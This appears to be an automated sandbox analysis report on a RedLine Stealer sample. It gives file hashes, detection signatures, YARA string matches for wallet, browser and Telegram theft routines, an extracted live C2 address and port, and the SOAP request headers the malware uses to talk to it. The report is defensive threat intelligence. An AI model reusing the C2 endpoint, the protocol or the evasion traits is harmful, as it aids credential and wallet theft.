Edit tour

Windows Analysis Report
UzQWEAhf9B.exe

Overview

General Information

Sample name:	UzQWEAhf9B.exe renamed because original name is a hash value
Original sample name:	357b2371c981675051594d5851dc7ca8.exe
Analysis ID:	1483383
MD5:	357b2371c981675051594d5851dc7ca8
SHA1:	f2e766123692f906b589e9a63059ec938e6c81f6
SHA256:	91146fa003f23bd4dae8f201f8941d7adc54474bd3215f6b4d3f9a783abc6805
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

UzQWEAhf9B.exe (PID: 5908 cmdline: "C:\Users\user\Desktop\UzQWEAhf9B.exe" MD5: 357B2371C981675051594D5851DC7CA8)

UzQWEAhf9B.exe (PID: 5820 cmdline: "C:\Users\user\Desktop\UzQWEAhf9B.exe" MD5: 357B2371C981675051594D5851DC7CA8)

UzQWEAhf9B.exe (PID: 4112 cmdline: "C:\Users\user\Desktop\UzQWEAhf9B.exe" MD5: 357B2371C981675051594D5851DC7CA8)

UzQWEAhf9B.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\UzQWEAhf9B.exe" MD5: 357B2371C981675051594D5851DC7CA8)

conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.236:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1438a:$a4: get_ScannedWallets 0x2c1aa:$a4: get_ScannedWallets 0x43dca:$a4: get_ScannedWallets 0x131e8:$a5: get_ScanTelegram 0x2b008:$a5: get_ScanTelegram 0x42c28:$a5: get_ScanTelegram 0x1400e:$a6: get_ScanGeckoBrowsersPaths 0x2be2e:$a6: get_ScanGeckoBrowsersPaths 0x43a4e:$a6: get_ScanGeckoBrowsersPaths 0x11e2a:$a7: <Processes>k__BackingField 0x29c4a:$a7: <Processes>k__BackingField 0x4186a:$a7: <Processes>k__BackingField 0xfd3c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x27b5c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3f77c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1175e:$a9: <ScanFTP>k__BackingField 0x2957e:$a9: <ScanFTP>k__BackingField 0x4119e:$a9: <ScanFTP>k__BackingField
00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: UzQWEAhf9B.exe PID: 5908	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UzQWEAhf9B.exe PID: 5908	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: UzQWEAhf9B.exe PID: 5908	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: UzQWEAhf9B.exe PID: 5908	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0xcd4b:$a4: get_ScannedWallets 0xbbf2:$a5: get_ScanTelegram 0xc9d4:$a6: get_ScanGeckoBrowsersPaths 0xa885:$a7: <Processes>k__BackingField 0x7db8:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xa1b9:$a9: <ScanFTP>k__BackingField
Process Memory Space: UzQWEAhf9B.exe PID: 6720	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: UzQWEAhf9B.exe PID: 6720	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: UzQWEAhf9B.exe PID: 6720	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x154a8d:$a4: get_ScannedWallets 0x153934:$a5: get_ScanTelegram 0x154716:$a6: get_ScanGeckoBrowsersPaths 0x1525c7:$a7: <Processes>k__BackingField 0x14fafa:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x151efb:$a9: <ScanFTP>k__BackingField
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.UzQWEAhf9B.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.UzQWEAhf9B.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.UzQWEAhf9B.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
4.2.UzQWEAhf9B.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.UzQWEAhf9B.exe.3f46dc0.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ee:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cf:$v2_6: GetUpdates
0.2.UzQWEAhf9B.exe.3f5ebe0.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ee:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cf:$v2_6: GetUpdates
0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
0.2.UzQWEAhf9B.exe.3f5ebe0.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x4300a:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x41e68:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x42c8e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0x40aaa:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x3e9bc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField 0x403de:$a9: <ScanFTP>k__BackingField
0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x3feca:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x43581:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x38b70:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x42ab9:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers
Click to see the 15 entries

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T06:57:52.425427+0200
SID:	2022930
Source Port:	443
Destination Port:	49716
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE RedLine - EnvironmentSettings Request - Source IP: 192.168.2.5 - Destination IP: 185.222.58.236

Timestamp:	2024-07-27T06:57:06.472981+0200
SID:	2849351
Source Port:	49704
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T06:57:14.120202+0200
SID:	2022930
Source Port:	443
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound - Source IP: 185.222.58.236 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T06:57:09.262622+0200
SID:	2045001
Source Port:	55615
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE RedLine - SetEnvironment Request - Source IP: 192.168.2.5 - Destination IP: 185.222.58.236

Timestamp:	2024-07-27T06:57:09.625326+0200
SID:	2849352
Source Port:	49706
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE RedLine - GetUpdates Request - Source IP: 192.168.2.5 - Destination IP: 185.222.58.236

Timestamp:	2024-07-27T06:57:11.274552+0200
SID:	2848200
Source Port:	49707
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE RedLine - CheckConnect Request - Source IP: 192.168.2.5 - Destination IP: 185.222.58.236

Timestamp:	2024-07-27T06:57:01.238594+0200
SID:	2849662
Source Port:	49704
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE RedLine Stealer - CheckConnect Response - Source IP: 185.222.58.236 - Destination IP: 192.168.2.5

Timestamp:	2024-07-27T06:57:06.264027+0200
SID:	2045000
Source Port:	55615
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: UzQWEAhf9B.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.222.58.236:55615	Avira URL Cloud: Label: malware
Source: 185.222.58.236:55615	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.UzQWEAhf9B.exe.3f46dc0.3.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.222.58.236:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: UzQWEAhf9B.exe	ReversingLabs: Detection: 87%
Source: UzQWEAhf9B.exe	Virustotal: Detection: 39%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: UzQWEAhf9B.exe

Joe Sandbox ML: detected

Source: UzQWEAhf9B.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: UzQWEAhf9B.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

Code function: 4x nop then jmp 02D35F76h

0_2_02D35BF5

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.222.58.236:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707

Source: global traffic

TCP traffic: 192.168.2.5:49704 -> 185.222.58.236:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.236:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.236:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.236:55615Content-Length: 982550Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.236:55615Content-Length: 982542Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.236

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.236:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.236:55615
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.236:55615/
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: UzQWEAhf9B.exe, 00000004.00000002.2168487722.000000000307F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
